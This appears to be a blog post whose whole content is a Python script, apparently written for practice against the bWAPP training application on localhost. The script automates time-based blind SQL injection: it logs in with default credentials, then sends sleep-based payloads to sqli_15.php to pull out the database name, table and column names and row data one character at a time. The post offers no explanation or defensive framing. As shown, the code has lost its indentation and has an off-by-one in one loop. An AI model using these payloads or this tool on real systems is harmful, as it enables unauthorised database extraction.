#coding:utf-8
import requests
import time
ip_port="127.0.0.1:80"
data={
"login":"bee",
"password":"bug",
"security_level":"0",
"form":"submit"
}
urlLogin="http://%s/login.php"%ip_port
session=requests.session()
resp=session.post(urlLogin,data)
num=0
#获取数据库名长度
def get_length_of_database():
i=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and length(database())=%d and sleep(1) -- &action=search"%(ip_port,i)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
return i
i=i+1
#获取数据库名字
def get_name_of_database():
length_of_database=get_length_of_database()
name_of_database=""
for j in range(1,length_of_database):
for k in range(33,128):
url="http://%s/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and sleep(1) -- &action=search"%(ip_port,j,k)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
name_of_database+=chr(k)
break
return name_of_database
#获取指定库中表的数量
def get_count_of_tables():
i=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and (select count(*) from information_schema.tables where table_schema=database())=%d and sleep(1) -- &action=search"%(ip_port,i)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
return i
i=i+1
#获取指定库所有表的表名长度的列表
def get_length_list_of_tables():
count_of_tables=get_count_of_tables()
length_list=[]
for i in range(0,count_of_tables):
j=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,i,j)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
length_list.append(j)
break
j=j+1
return length_list
#获取指定库中的所有表名列表
def get_tables():
count_of_tables=get_count_of_tables()
length_list=get_length_list_of_tables()
name_of_tables=[]
for i in range(0,count_of_tables):
name=""
for j in range(0,length_list[i]):
for k in range(33,128):
url="http://%s/sqli_15.php?title=World War Z' and (select ascii(substr((table_name),%d,1)) from information_schema.tables where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,j+1,i,k)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
name+=chr(k)
break
name_of_tables.append(name)
return name_of_tables
#获取指定表中列的数量
def get_count_of_columns(name_of_table):
i=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and (select count(*) from information_schema.columns where table_schema=database() and table_name=\"%s\")=%d and sleep(1) -- &action=search"%(ip_port,name_of_table,i)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
return i
i+=1
#获取指定表所有列的列名长度
def get_length_list_of_columns(name_of_table):
count_of_columns=get_count_of_columns(name_of_table)
length_list=[]
for i in range(0,count_of_columns):
j=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name=\"%s\" limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,name_of_table,i,j)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
length_list.append(j)
break
j=j+1
return length_list
#获取指定表的所有列的列名
def get_columns(name_of_table):
count_of_columns=get_count_of_columns(name_of_table)
length_list=get_length_list_of_columns(name_of_table)
columns=[]
for i in range(0,count_of_columns):
name=""
for j in range(0,length_list[i]):
for k in range(33,128):
url="http://%s/sqli_15.php?title=World War Z' and (select ascii(substr((column_name),%d,1)) from information_schema.columns where table_schema=database() and table_name=\"%s\" limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,j+1,name_of_table,i,k)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
name+=chr(k)
break
columns.append(name)
return columns
#获取指定表指定列名数据个数
def get_count_of_datas(name_of_table,name_of_column):
i=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and (select count(%s) from %s)=%d and sleep(1) -- &action=search"%(ip_port,name_of_column,name_of_table,i)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
return i
i+=1
#获取指定表指定列名数据长度列表
def get_length_list_of_datas(name_of_table,name_of_column):
count_of_datas=get_count_of_datas(name_of_table,name_of_column)
length_list=[]
for i in range(0,count_of_datas):
j=1
while True:
url="http://%s/sqli_15.php?title=World War Z' and (select length(%s) from %s limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,name_of_column,name_of_table,i,j)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
length_list.append(j)
break
j+=1
return length_list
#爆破数据
def get_datas(name_of_table,name_of_column):
count_of_datas=get_count_of_datas(name_of_table,name_of_column)
length_list=get_length_list_of_datas(name_of_table,name_of_column)
datas=[]
for i in range(count_of_datas):
data=""
for j in range(length_list[i]):
for k in range(33,128):
url="http://%s/sqli_15.php?title=World War Z' and (select ascii(substr((%s),%d,1)) from %s limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,name_of_column,j+1,name_of_table,i,k)
startTime=time.time()
rsq=session.get(url)
endTime=time.time()
ga=endTime-startTime
if ga>1:
data+=chr(k)
break
datas.append(data)
return datas
def main():
print("Judging the database...")
print()
print("Getting the table name...")
tables=get_tables()
for i in tables:
print ("[+]%s"%(i))
print("The table names in this database are:%s"%(tables))
table=input("Select the Table name:")
if table not in tables:
print("Error!")
exit()
print()
print("Getting the column names in the %s table......"%(table))
columns=get_columns(table)
for i in columns:
print("[+]%s"%(i))
print("The column name in %s are:%s"%(table,columns))
column=input("Select the Column name:")
if column not in columns:
print("Error!")
exit()
print()
print("Getting the datas......")
datas=get_datas(table,column)
for i in datas:
print("[+]%s"%(i))
if __name__=='__main__':
main()
SQL盲注脚本
于 2021-12-14 16:30:50 首次发布